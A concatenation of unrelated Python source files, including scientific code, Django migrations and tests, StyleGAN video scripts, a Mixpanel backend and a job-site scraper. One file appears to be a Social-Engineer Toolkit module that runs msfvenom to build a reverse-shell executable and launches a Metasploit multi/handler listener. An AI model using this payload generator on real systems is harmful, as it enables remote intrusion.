* inversion.frequency
* time[:, None] - inversion.phase)
- inversion.decay * time[:, None]))
reconstruction = components.sum(axis=1)
"""
harm = Harminv(signal, fmin=fmin, fmax=fmax, dt=dt, nf=nf)
array_names = [(harm.freq, 'frequency'),
(harm.amplitude, 'amplitude'),
(harm.phase, 'phase'),
(harm.decay, 'decay'),
(harm.Q, 'Q'),
(harm.error, 'error')]
arrays, names = zip(*array_names)
return np.rec.fromarrays(arrays, names=names)
|
"""Add ProjectOption
Revision ID: 1d1f467bdf3d
Revises: 105d4dd82a0a
Create Date: 2013-11-20 16:04:25.408018
"""
# revision identifiers, used by Alembic.
revision = '1d1f467bdf3d'
down_revision = '105d4dd82a0a'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'projectoption',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('project_id', sa.GUID(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=False),
sa.Column('value', sa.Text(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('project_id', 'name', name='unq_projectoption_name')
)
def downgrade():
op.drop_table('projectoption')
|
"""https://leetcode.com/problems/maximum-depth-of-binary-tree/
Examples:
>>> Solution().maxDepth(None)
0
"""
from typing import Optional
from pytudes._2021.utils import binary_tree
# Definition for a binary tree node.
# class TreeNode:
# def __init__(
# self, val: int = 0, left: "TreeNodeType" = None, right: "TreeNodeType" = None
# ):
# self.val = val
# self.left = left
# self.right = right
#
TreeNodeType = Optional[binary_tree.TreeNode]
class Solution:
def maxDepth(self, root: TreeNodeType) -> int:
return max_depth(root)
def max_depth(root: TreeNodeType) -> int:
"""
Args:
root: TreeNode root of a binary tree
Returns: depth of the binary tree rooted at `root`
Examples:
>>> max_depth(binary_tree.build_tree([3,9,20,None,None,15,7]))
3
>>> max_depth(binary_tree.build_tree([1,None,2]))
2
>>> max_depth(binary_tree.build_tree([0]))
1
>>> max_depth(binary_tree.build_tree([]))
0
"""
## BASE CASE ##
if not root:
return 0
"""ALGORITHM"""
## RECURSIVE CASE ##
return 1 + max(max_depth(root.left), max_depth(root.right))
|
# -*- coding=utf -*-
from __future__ import absolute_import
from cubes.model import Cube, create_dimension
from cubes.model import aggregate_list
from cubes.browser import *
from cubes.stores import Store
from cubes.errors import *
from cubes.providers import ModelProvider
from cubes.logging import get_logger
from .mixpanel import *
from .mapper import cube_event_key
from string import capwords
import pkgutil
import time, pytz
DIMENSION_COUNT_LIMIT = 100
DEFAULT_TIME_HIERARCHY = "ymdh"
MXP_TIME_DIM_METADATA = {
"name": "time",
"role": "time",
"levels": [
{ "name": "year", "label": "Year" },
{ "name": "month", "label": "Month", "info": { "aggregation_units": 3 }},
{ "name": "day", "label": "Day", "info": { "aggregation_units": 7 } },
{ "name": "hour", "label": "Hour", "info": { "aggregation_units": 6 } },
{ "name": "week", "label": "Week", "info": { "aggregation_units": 4 } },
{ "name": "date", "label": "Date", "info": { "aggregation_units": 7 } }
],
"hierarchies": [
{"name": "ymdh", "levels": ["year", "month", "day", "hour"]},
{"name": "wdh", "levels": ["week", "date", "hour"]}
],
"default_hierarchy_name": "ymdh",
"info": {"is_date": True}
}
MXP_AGGREGATES_METADATA = [
{
"name": "total",
"label": "Total"
},
{
"name": "total_sma",
"label": "Total Moving Average",
"function": "sma",
"measure": "total"
},
{
"name": "unique",
"label": "Unique"
},
{
"name": "unique_sma",
"label": "Unique Moving Average",
"function": "sma",
"measure": "unique"
},
]
_time_dimension = create_dimension(MXP_TIME_DIM_METADATA)
def _mangle_dimension_name(name):
"""Return a dimension name from a mixpanel property name."""
fixed_name = name.replace("$", "_")
fixed_name = fixed_name.replace(" ", "_")
return fixed_name
class MixpanelModelProvider(ModelProvider):
def __init__(self, *args, **kwargs):
super(MixpanelModelProvider, self).__init__(*args, **kwargs)
# TODO: replace this with mixpanel mapper
# Map properties to dimension (reverse mapping)
self.property_to_dimension = {}
self.event_to_cube = {}
self.cube_to_event = {}
mappings = self.metadata.get("mappings", {})
# Move this into the Mixpanel Mapper
for name in self.dimensions_metadata.keys():
try:
prop = mappings[name]
except KeyError:
pass
else:
self.property_to_dimension[prop] = name
for name in self.cubes_metadata.keys():
try:
event = mappings[cube_event_key(name)]
except KeyError:
pass
else:
self.cube_to_event[name] = event
self.event_to_cube[event] = name
def default_metadata(self, metadata=None):
"""Return Mixpanel's default metadata."""
model = pkgutil.get_data("cubes.backends.mixpanel", "mixpanel_model.json")
metadata = json.loads(model)
return metadata
def requires_store(self):
return True
def public_dimensions(self):
"""Return an empty list. Mixpanel does not export any dimensions."""
return []
def cube(self, name, locale=None):
"""Creates a mixpanel cube with following variables:
* `name` – cube name
* `measures` – cube measures: `total` and `uniques`
* `dimension_links` – list of linked dimension names
* `mappings` – mapping of corrected dimension names
Dimensions are Mixpanel's properties where ``$`` character is replaced
by the underscore ``_`` character.
"""
params = {
"event": self.cube_to_event.get(name, name),
"limit": DIMENSION_COUNT_LIMIT
}
result = self.store.request(["events", "properties", "top"], params)
if not result:
raise NoSuchCubeError("Unknown Mixpanel cube %s" % name, name)
try:
metadata = self.cube_metadata(name)
except NoSuchCubeError:
metadata = {}
options = self.cube_options(name)
allowed_dims = options.get("allowed_dimensions", [])
denied_dims = options.get("denied_dimensions", [])
dims = ["time"]
mappings = {}
for prop in result.keys():
try:
dim_name = self.property_to_dimension[prop]
except KeyError:
dim_name = _mangle_dimension_name(prop)
# Skip not allowed dimensions
if (allowed_dims and dim_name not in allowed_dims) or \
(denied_dims and dim_name in denied_dims):
continue
if dim_name != prop:
mappings[dim_name] = prop
dims.append(dim_name)
aggregates = aggregate_list(MXP_AGGREGATES_METADATA)
label = metadata.get("label", capwords(name.replace("_", " ")))
category = metadata.get("category", self.store.category)
cube = Cube(name=name,
aggregates=aggregates,
label=label,
description=category,
info=metadata.get("info"),
dimension_links=dims,
store=self.store,
mappings=mappings,
category=category)
cube.info["required_drilldowns"] = ["time"]
return cube
def dimension(self, name, locale=None, templates=[]):
if name == "time":
return _time_dimension
try:
metadata = self.dimension_metadata(name)
except NoSuchDimensionError:
metadata = {"name": name}
return create_dimension(metadata)
def list_cubes(self):
result = self.store.request(["events", "names"], {"type": "general", })
cubes = []
for event in result:
name = self.event_to_cube.get(event, event)
try:
metadata = self.cube_metadata(name)
except NoSuchCubeError:
metadata = {}
label = metadata.get("label", capwords(name.replace("_", " ")))
category = metadata.get("category", self.store.category)
cube = {
"name": name,
"label": label,
"category": category
}
cubes.append(cube)
return cubes
class MixpanelStore(Store):
related_model_provider = "mixpanel"
def __init__(self, api_key, api_secret, category=None, tz=None, **options):
super(MixpanelStore, self).__init__(**options)
self.mixpanel = Mixpanel(api_key, api_secret)
self.category = category or "Mixpanel Events"
if tz is not None:
tz = pytz.timezone(tz)
else:
tz = pytz.timezone(time.strftime('%Z', time.localtime()))
self.tz = tz
self.logger = get_logger()
def request(self, *args, **kwargs):
"""Performs a mixpanel HTTP request. Raises a BackendError when
mixpanel returns `error` in the response."""
self.logger.debug("Mixpanel request: %s" % (args,))
try:
response = self.mixpanel.request(*args, **kwargs)
except MixpanelError as e:
raise BackendError("Mixpanel request error: %s" % str(e))
return response
|
#!/usr/bin/env python3
import py_trees
blackboard = py_trees.blackboard.Client(name="Global")
parameters = py_trees.blackboard.Client(name="Parameters", namespace="parameters")
blackboard.register_key(key="foo", access=py_trees.common.Access.WRITE)
blackboard.register_key(key="/bar", access=py_trees.common.Access.WRITE)
blackboard.register_key(key="/parameters/default_speed", access=py_trees.common.Access.WRITE)
parameters.register_key(key="aggressive_speed", access=py_trees.common.Access.WRITE)
blackboard.foo = "foo"
blackboard.bar = "bar"
blackboard.parameters.default_speed = 20.0
parameters.aggressive_speed = 60.0
miss_daisy = blackboard.parameters.default_speed
van_diesel = parameters.aggressive_speed
print(blackboard)
print(parameters)
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utility functions for the movielens-recommender demo
"""
from numba import jit
import numpy as np
import pandas as pd
import networkx as nx
import os
@jit(nopython=True)
def remap_ids(data, uid_map, mid_map, uid_inx=0, mid_inx=1):
"""
Remap user and movie IDs
"""
Nm = mid_map.shape[0]
Nu = uid_map.shape[0]
for ii in range(data.shape[0]):
mid = data[ii, mid_inx]
uid = data[ii, uid_inx]
new_mid = np.searchsorted(mid_map, mid)
new_uid = np.searchsorted(uid_map, uid)
if new_mid < 0:
print(mid, new_mid)
# Only map to index if found, else map to zero
if new_uid < Nu and (uid_map[new_uid] == uid):
data[ii, uid_inx] = new_uid + Nm
else:
data[ii, uid_inx] = -1
data[ii, mid_inx] = new_mid
def ingest_graph(data_path, config):
"""Ingest a graph from user-movie ratings"""
edgelist_name = os.path.join(data_path, config["input_files"]["ratings"])
columns = config["ratings_params"]["columns"]
usecols = config["ratings_params"]["usecols"]
sep = config["ratings_params"]["sep"]
header = config["ratings_params"].get("header")
# Load the edgelist:
ratings = pd.read_csv(
edgelist_name,
names=columns,
sep=sep,
header=header,
usecols=usecols,
engine="python",
dtype="int",
)
# Enumerate movies & users
mids = np.unique(ratings["mId"])
uids = np.unique(ratings["uId"])
# Filter data and transform
remap_ids(ratings.values, uids, mids)
# Node ID map back to movie and user IDs
movie_id_map = {i: "m_{}".format(mId) for i, mId in enumerate(mids)}
user_id_map = {i + len(mids): "u_{}".format(uId) for i, uId in enumerate(uids)}
id_map = {**movie_id_map, **user_id_map}
inv_id_map = dict(zip(id_map.values(), id_map.keys()))
# Create networkx graph
g = nx.from_pandas_edgelist(
ratings, source="uId", target="mId", edge_attr=True, create_using=nx.DiGraph()
)
# Add node types:
node_types = {inv_id_map["m_" + str(v)]: "movie" for v in mids}
node_types.update({inv_id_map["u_" + str(v)]: "user" for v in uids})
nx.set_node_attributes(g, name="label", values=node_types)
print(
"Graph statistics: {} users, {} movies, {} ratings".format(
sum([v[1]["label"] == "user" for v in g.nodes(data=True)]),
sum([v[1]["label"] == "movie" for v in g.nodes(data=True)]),
g.number_of_edges(),
)
)
return g, id_map, inv_id_map
def ingest_features(data_path, config, node_type):
"""Ingest fatures for nodes of node_type"""
filename = os.path.join(data_path, config["input_files"][node_type])
if node_type == "users":
parameters = config["user_feature_params"]
elif node_type == "movies":
parameters = config["movie_feature_params"]
else:
raise ValueError("Unknown node type {}".format(node_type))
columns = parameters.get("columns")
formats = parameters.get("formats")
usecols = parameters.get("usecols")
sep = parameters.get("sep", ",")
feature_type = parameters.get("feature_type")
dtype = parameters.get("dtype", "float32")
header = parameters.get("header")
# Load Data
data = pd.read_csv(
filename,
index_col=0,
names=columns,
sep=sep,
header=header,
engine="python",
usecols=usecols,
)
return data
def add_features_to_nodes(g, inv_id_map, user_features, movie_features):
"""Add user and movie features to graph nodes"""
movie_features_dict = {
k: np.array(movie_features.loc[k]) for k in movie_features.index
}
user_features_dict = {
k: np.array(user_features.loc[k]) for k in user_features.index
}
node_features = {}
for v in movie_features.index:
node_features.update({inv_id_map["m_" + str(v)]: movie_features_dict[v]})
for v in user_features.index:
node_features.update({inv_id_map["u_" + str(v)]: user_features_dict[v]})
nx.set_node_attributes(g, name="feature", values=node_features)
return g
|
from cognite.power.client import PowerClient
from cognite.power.data_classes import PowerAsset, PowerAssetList
from cognite.power.power_area import PowerArea
from cognite.power.power_corridor import PowerCorridor, PowerCorridorComponent
from cognite.power.power_graph import PowerGraph
|
# Generated by Django 3.0.7 on 2020-07-29 06:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('graphs', '0004_alabama_temperature_input'),
]
operations = [
migrations.CreateModel(
name='Temps',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('temperature_input', models.IntegerField()),
],
),
migrations.RemoveField(
model_name='alabama',
name='temperature_input',
),
]
|
import os
import pickle
import numpy as np
import PIL.Image
import dnnlib
import dnnlib.tflib as tflib
import config
import scipy
import dnnlib.tflib as tflib
import math
import moviepy.editor
from numpy import linalg
import numpy as np
import pickle
def main():
tflib.init_tf()
# Load pre-trained network.
# url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ'
# with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f:
## NOTE: insert model here:
_G, _D, Gs = pickle.load(open(config.Model, "rb"))
# _G = Instantaneous snapshot of the generator. Mainly useful for resuming a previous training run.
# _D = Instantaneous snapshot of the discriminator. Mainly useful for resuming a previous training run.
# Gs = Long-term average of the generator. Yields higher-quality results than the instantaneous snapshot.
grid_size = [2, 2]
image_shrink = 1
image_zoom = 1
duration_sec = 60.0
smoothing_sec = 1.0
mp4_fps = 20
mp4_codec = 'libx264'
mp4_bitrate = '5M'
random_seed = 404
mp4_file = 'results/random_grid_%s.mp4' % random_seed
minibatch_size = 8
num_frames = int(np.rint(duration_sec * mp4_fps))
random_state = np.random.RandomState(random_seed)
# Generate latent vectors
shape = [num_frames, np.prod(grid_size)] + Gs.input_shape[1:] # [frame, image, channel, component]
all_latents = random_state.randn(*shape).astype(np.float32)
import scipy
all_latents = scipy.ndimage.gaussian_filter(all_latents,
[smoothing_sec * mp4_fps] + [0] * len(Gs.input_shape), mode='wrap')
all_latents /= np.sqrt(np.mean(np.square(all_latents)))
def create_image_grid(images, grid_size=None):
assert images.ndim == 3 or images.ndim == 4
num, img_h, img_w, channels = images.shape
if grid_size is not None:
grid_w, grid_h = tuple(grid_size)
else:
grid_w = max(int(np.ceil(np.sqrt(num))), 1)
grid_h = max((num - 1) // grid_w + 1, 1)
grid = np.zeros([grid_h * img_h, grid_w * img_w, channels], dtype=images.dtype)
for idx in range(num):
x = (idx % grid_w) * img_w
y = (idx // grid_w) * img_h
grid[y: y + img_h, x: x + img_w] = images[idx]
return grid
# Frame generation func for moviepy.
def make_frame(t):
frame_idx = int(np.clip(np.round(t * mp4_fps), 0, num_frames - 1))
latents = all_latents[frame_idx]
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
images = Gs.run(latents, None, truncation_psi=0.7,
randomize_noise=False, output_transform=fmt)
grid = create_image_grid(images, grid_size)
if image_zoom > 1:
grid = scipy.ndimage.zoom(grid, [image_zoom, image_zoom, 1], order=0)
if grid.shape[2] == 1:
grid = grid.repeat(3, 2) # grayscale => RGB
return grid
# Generate video.
import moviepy.editor
video_clip = moviepy.editor.VideoClip(make_frame, duration=duration_sec)
video_clip.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
####################################################################################################################
# # import scipy
# # coarse
# duration_sec = 60.0
# smoothing_sec = 1.0
# mp4_fps = 20
#
# num_frames = int(np.rint(duration_sec * mp4_fps))
# random_seed = 500
# random_state = np.random.RandomState(random_seed)
#
# w = 512
# h = 512
# # src_seeds = [601]
# dst_seeds = [700]
# style_ranges = ([0] * 7 + [range(8, 16)]) * len(dst_seeds)
#
# fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
# synthesis_kwargs = dict(output_transform=fmt, truncation_psi=0.7, minibatch_size=8)
#
# shape = [num_frames] + Gs.input_shape[1:] # [frame, image, channel, component]
# src_latents = random_state.randn(*shape).astype(np.float32)
# src_latents = scipy.ndimage.gaussian_filter(src_latents,
# smoothing_sec * mp4_fps,
# mode='wrap')
# src_latents /= np.sqrt(np.mean(np.square(src_latents)))
#
# dst_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in dst_seeds)
#
# src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component]
# dst_dlatents = Gs.components.mapping.run(dst_latents, None) # [seed, layer, component]
# src_images = Gs.components.synthesis.run(src_dlatents, randomize_noise=False, **synthesis_kwargs)
# dst_images = Gs.components.synthesis.run(dst_dlatents, randomize_noise=False, **synthesis_kwargs)
#
# canvas = PIL.Image.new('RGB', (w * (len(dst_seeds) + 1), h * 2), 'white')
#
# for col, dst_image in enumerate(list(dst_images)):
# canvas.paste(PIL.Image.fromarray(dst_image, 'RGB'), ((col + 1) * h, 0))
#
# def make_frame(t):
# frame_idx = int(np.clip(np.round(t * mp4_fps), 0, num_frames - 1))
# src_image = src_images[frame_idx]
# canvas.paste(PIL.Image.fromarray(src_image, 'RGB'), (0, h))
#
# for col, dst_image in enumerate(list(dst_images)):
# col_dlatents = np.stack([dst_dlatents[col]])
# col_dlatents[:, style_ranges[col]] = src_dlatents[frame_idx, style_ranges[col]]
# col_images = Gs.components.synthesis.run(col_dlatents, randomize_noise=False, **synthesis_kwargs)
# for row, image in enumerate(list(col_images)):
# canvas.paste(PIL.Image.fromarray(image, 'RGB'), ((col + 1) * h, (row + 1) * w))
# return np.array(canvas)
#
# # Generate video.
# import moviepy.editor
# mp4_file = 'results/interpolate.mp4'
# mp4_codec = 'libx264'
# mp4_bitrate = '5M'
#
# video_clip = moviepy.editor.VideoClip(make_frame, duration=duration_sec)
# video_clip.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
#
####################################################################################################################
# import scipy
#
# duration_sec = 60.0
# smoothing_sec = 1.0
# mp4_fps = 20
#
# num_frames = int(np.rint(duration_sec * mp4_fps))
# random_seed = 503
# random_state = np.random.RandomState(random_seed)
#
# w = 512
# h = 512
# style_ranges = [range(6, 16)]
#
# fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
# synthesis_kwargs = dict(output_transform=fmt, truncation_psi=0.7, minibatch_size=8)
#
# shape = [num_frames] + Gs.input_shape[1:] # [frame, image, channel, component]
# src_latents = random_state.randn(*shape).astype(np.float32)
# src_latents = scipy.ndimage.gaussian_filter(src_latents,
# smoothing_sec * mp4_fps,
# mode='wrap')
# src_latents /= np.sqrt(np.mean(np.square(src_latents)))
#
# dst_latents = np.stack([random_state.randn(Gs.input_shape[1])])
#
# src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component]
# dst_dlatents = Gs.components.mapping.run(dst_latents, None) # [seed, layer, component]
#
# def make_frame(t):
# frame_idx = int(np.clip(np.round(t * mp4_fps), 0, num_frames - 1))
# col_dlatents = np.stack([dst_dlatents[0]])
# col_dlatents[:, style_ranges[0]] = src_dlatents[frame_idx, style_ranges[0]]
# col_images = Gs.components.synthesis.run(col_dlatents, randomize_noise=False, **synthesis_kwargs)
# return col_images[0]
#
# # Generate video.
# import moviepy.editor
# mp4_file = 'results/fine_%s.mp4' % (random_seed)
# mp4_codec = 'libx264'
# mp4_bitrate = '5M'
#
# video_clip = moviepy.editor.VideoClip(make_frame, duration=duration_sec)
# video_clip.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
def circular():
tflib.init_tf()
_G, _D, Gs = pickle.load(open(config.Model, "rb"))
rnd = np.random
latents_a = rnd.randn(1, Gs.input_shape[1])
latents_b = rnd.randn(1, Gs.input_shape[1])
latents_c = rnd.randn(1, Gs.input_shape[1])
def circ_generator(latents_interpolate):
radius = 40.0
latents_axis_x = (latents_a - latents_b).flatten() / linalg.norm(latents_a - latents_b)
latents_axis_y = (latents_a - latents_c).flatten() / linalg.norm(latents_a - latents_c)
latents_x = math.sin(math.pi * 2.0 * latents_interpolate) * radius
latents_y = math.cos(math.pi * 2.0 * latents_interpolate) * radius
latents = latents_a + latents_x * latents_axis_x + latents_y * latents_axis_y
return latents
def mse(x, y):
return (np.square(x - y)).mean()
def generate_from_generator_adaptive(gen_func):
max_step = 1.0
current_pos = 0.0
change_min = 10.0
change_max = 11.0
fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True)
current_latent = gen_func(current_pos)
current_image = Gs.run(current_latent, None, truncation_psi=0.7, randomize_noise=False, output_transform=fmt)[0]
array_list = []
video_length = 1.0
while current_pos < video_length:
array_list.append(current_image)
lower = current_pos
upper = current_pos + max_step
current_pos = (upper + lower) / 2.0
current_latent = gen_func(current_pos)
current_image = images = \
Gs.run(current_latent, None, truncation_psi=0.7, randomize_noise=False, output_transform=fmt)[0]
current_mse = mse(array_list[-1], current_image)
while current_mse < change_min or current_mse > change_max:
if current_mse < change_min:
lower = current_pos
current_pos = (upper + lower) / 2.0
if current_mse > change_max:
upper = current_pos
current_pos = (upper + lower) / 2.0
current_latent = gen_func(current_pos)
current_image = images = \
Gs.run(current_latent, None, truncation_psi=0.7, randomize_noise=False, output_transform=fmt)[0]
current_mse = mse(array_list[-1], current_image)
print("%s / %s : %s" % (current_pos, video_length, current_mse))
return array_list
frames = generate_from_generator_adaptive(circ_generator)
frames = moviepy.editor.ImageSequenceClip(frames, fps=30)
# Generate video.
mp4_file = 'results/circular.mp4'
mp4_codec = 'libx264'
mp4_bitrate = '3M'
mp4_fps = 20
frames.write_videofile(mp4_file, fps=mp4_fps, codec=mp4_codec, bitrate=mp4_bitrate)
if __name__ == "__main__":
main()
circular()
|
from __future__ import with_statement
import six
if six.PY3:
import unittest
else:
import unittest2 as unittest
from mock import Mock, patch
from twilio.rest.resources import AuthorizedConnectApps
from twilio.rest.resources import AuthorizedConnectApp
class AuthorizedConnectAppTest(unittest.TestCase):
def setUp(self):
self.parent = Mock()
self.uri = "/base"
self.auth = ("AC123", "token")
self.resource = AuthorizedConnectApps(self.uri, self.auth)
@patch("twilio.rest.resources.base.make_twilio_request")
def test_get(self, mock):
mock.return_value = Mock()
mock.return_value.content = '{"connect_app_sid": "SID"}'
self.resource.get("SID")
mock.assert_called_with("GET", "/base/AuthorizedConnectApps/SID",
auth=self.auth)
@patch("twilio.rest.resources.base.make_twilio_request")
def test_list(self, mock):
mock.return_value = Mock()
mock.return_value.content = '{"authorized_connect_apps": []}'
self.resource.list()
mock.assert_called_with("GET", "/base/AuthorizedConnectApps",
params={}, auth=self.auth)
def test_load(self):
instance = AuthorizedConnectApp(Mock(), "sid")
instance.load({
"connect_app_sid": "SID",
"account_sid": "AC8dfe2f2358cf421cb6134cf6f217c6a3",
"permissions": ["get-all"],
"connect_app_friendly_name": "foo",
"connect_app_description": "bat",
"connect_app_company_name": "bar",
"connect_app_homepage_url": "http://www.google.com",
"uri": "/2010-04-01/Accounts/",
})
self.assertEquals(instance.permissions, ["get-all"])
self.assertEquals(instance.sid, "SID")
self.assertEquals(instance.friendly_name, "foo")
self.assertEquals(instance.description, "bat")
self.assertEquals(instance.homepage_url, "http://www.google.com")
self.assertEquals(instance.company_name, "bar")
def test_delete(self):
with self.assertRaises(AttributeError):
self.resource.delete()
def test_create(self):
with self.assertRaises(AttributeError):
self.resource.create()
def test_update(self):
with self.assertRaises(AttributeError):
self.resource.update()
|
#!/usr/bin/env python
import subprocess
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
# definepath
definepath = os.getcwd()
sys.path.append(definepath)
# grab the metasploit path
meta_path = meta_path()
# here we handle our main payload generation
def payload_generate(payload, lhost, port):
# generate metasploit
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
(payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
# write out the rc file
filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
filewrite.close()
print_status(
"Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload = (raw_input(setprompt(["4"], "")))
# if its default then select meterpreter
if payload == "":
payload = "2"
# assign the right payload
payload = ms_payload(payload)
lhost = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
port = raw_input(setprompt(["4"], "Enter the PORT for the reverse listener"))
# print to user that payload is being generated
print_status("Generating the payload.. please be patient.")
# generate the actual payload
payload_generate(payload, lhost, port)
# check options to see if we are using the infectious media generator
if check_options("INFECTION_MEDIA=") != "ON":
# start the payload for the user
payload_query = raw_input(setprompt(
["4"], "Do you want to start the payload and listener now? (yes/no)"))
if payload_query.lower() == "y" or payload_query.lower() == "yes":
print_status(
"Launching msfconsole, this could take a few to load. Be patient...")
subprocess.Popen(meta_path + "msfconsole -r " +
userconfigpath + "meta_config", shell=True).wait()
|
import logging
import math
import re
import time
import uuid
from datetime import datetime
from os import path
import requests
from config import Config
class Run(Config):
def __init__(self):
super(Run, self).__init__()
self.collection = self.Collection(__file__)
self.exploitUrl = 'https://www.lagou.com/gongsi/0-0-0.json'
self.protocal = 'https'
self.host = 'www.lagou.com'
self.totalCount = 2000
self.pageSize = 16
self.key = 'companyId'
self.main()
def cookie(self):
now = datetime.now()
year = str(now.year)
month = str(now.month).rjust(2, "0")
day = str(now.day).rjust(2, "0")
hour = str(now.hour).rjust(2, "0")
minute = str(now.minute).rjust(2, "0")
second = str(now.second).rjust(2, "0")
try:
res = re.search("^JSESSIONID=([0-9A-Z]{32}).*$", requests.get("https://www.lagou.com").headers["Set-Cookie"]).group(1)
except Exception as e:
time.sleep(self.RandomLimit())
return self.cookie()
return "JSESSIONID=" + res + "; user_trace_token=" + year + month + day + hour + minute + second + "-" + "".join(str(uuid.uuid4()).split("-"))
def main(self):
cookie = self.cookie()
while True:
for num in range(1, int(math.ceil(self.totalCount / self.pageSize))):
try:
header = self.Header(self.protocal, self.host)
if num % 10 == 0:
cookie = self.cookie()
header["Cookie"] = cookie
requestBody = {"pn": num, "first": "false", "sortField": 0, "havemark": 0}
res = requests.post(self.exploitUrl, headers=header, timeout=60, data=requestBody)
response = res.json()
self.totalCount = int(response.get("totalCount"))
self.pageSize = int(response.get("pageSize"))
for data in response.get("result"):
logging.info(data["companyFullName"])
self.MGO[self.collection].find_one_and_replace({'companyId': data["companyId"]}, data, upsert=True)
except Exception as e:
self.totalCount = 2000
self.pageSize = 16
logging.error("Post " + str(num) + " with error.")
logging.error(e)
time.sleep(self.RandomLimit())
|
# Python
from __future__ import unicode_literals
# Django-Site-Utils
from site_utils.utils import app_is_installed
def test_app_is_installed(settings):
assert app_is_installed('contenttypes')
assert app_is_installed('django.contrib.contenttypes')
assert app_is_installed('admin')
assert app_is_installed('django.contrib.admin')
assert not app_is_installed('flatpages')
assert not app_is_installed('django.contrib.flatpages')
assert app_is_installed('site_utils')
|
'''
To run functional tests:
python3 manage.py test functional_tests
'''
import sys
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
class NewVisitorTest(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
for arg in sys.argv:
if 'liveserver' in arg:
cls.server_url = 'http://' + arg.split('=')[1]
return
super().setUpClass()
cls.server_url = cls.live_server_url
@classmethod
def tearDownClass(cls):
if cls.server_url == cls.live_server_url:
super().tearDownClass()
def setUp(self):
self.browser = webdriver.Firefox()
self.browser.implicitly_wait(3)
def tearDown(self):
self.browser.quit()
def test_can_view_home_page(self):
# Come to check out portfolio home page
self.browser.get(self.server_url)
# see that the title mentiosn portfolio
self.assertIn('Finders Keepers', self.browser.title)
# And the basic elements are rendered
self.browser.find_element_by_id('map')
self.browser.find_element_by_id('message')
def test_layout_and_styling(self):
self.browser.get(self.server_url)
h1 = self.browser.find_element_by_tag_name('h1')
self.assertEqual(h1.value_of_css_property(
'color'), 'rgba(255, 255, 255, 1)')
|
from django.db.models.loading import get_model
from mptt import models as mpttmodels
from django.db import models
from django.conf import settings
from accounts.business.fields import MemberStatusField
from nodes.business.managers import NodeManager
from nodes.roles import ManageRole
from vaultier.business.db import TimestampableMixin
from django_mptt_acl.models import PolicyModel, ReadRole, CreateRole, WriteRole
class Node(mpttmodels.MPTTModel, TimestampableMixin):
"""
Node model
"""
ENC_VERSION = 1
name = models.CharField(max_length=255)
meta = models.TextField(null=True, blank=True)
type = models.IntegerField()
data = models.TextField(null=True, blank=True)
blob_data = models.FileField(
upload_to='', null=True, blank=True)
color = models.CharField(max_length=7, blank=True, null=True)
parent = mpttmodels.TreeForeignKey(
'self', null=True, blank=True, related_name='children')
enc_version = models.IntegerField(default=ENC_VERSION)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL, related_name="nodes")
objects = NodeManager()
# class Meta:
# db_table = u'vaultier_node'
def get_user_member(self, user):
model = get_model("accounts.Member")
return model.objects.get(user=user, node=self.get_root())
def save(self, *args, **kwargs):
self.acl_propagation_stopped = True
super(Node, self).save(*args, **kwargs)
if kwargs.get('force_insert') and not self.parent:
self.acl_principal = get_model('accounts', 'Member')(
node=self,
user=self.created_by,
status=MemberStatusField.STATUS_MEMBER,
created_by=self.created_by
)
self.acl_principal.save()
else:
try:
member = get_model('accounts', 'Member').objects.get(
node=self.get_root(), user=self.created_by)
self.acl_principal = member
except:
pass
self.acl.insert(created=kwargs.get('force_insert'))
def delete(self, *args, **kwargs):
self.acl_principal = get_model('accounts', 'Member').objects.get(
node=self.get_root(), user=self.created_by)
super(Node, self).delete(*args, **kwargs)
class Policy(PolicyModel):
principal = models.ForeignKey("accounts.Member")
subject = models.ForeignKey(Node, related_name="_policies")
# class Meta:
# db_table = u'vaultier_policy'
def get_user_member(self, user):
model = get_model("accounts.Member")
return model.objects.get(user=user, node=self.subject.get_root())
class PolicyMeta:
subject_owner_field = 'created_by'
roles = {
'manage': ManageRole,
'read': ReadRole,
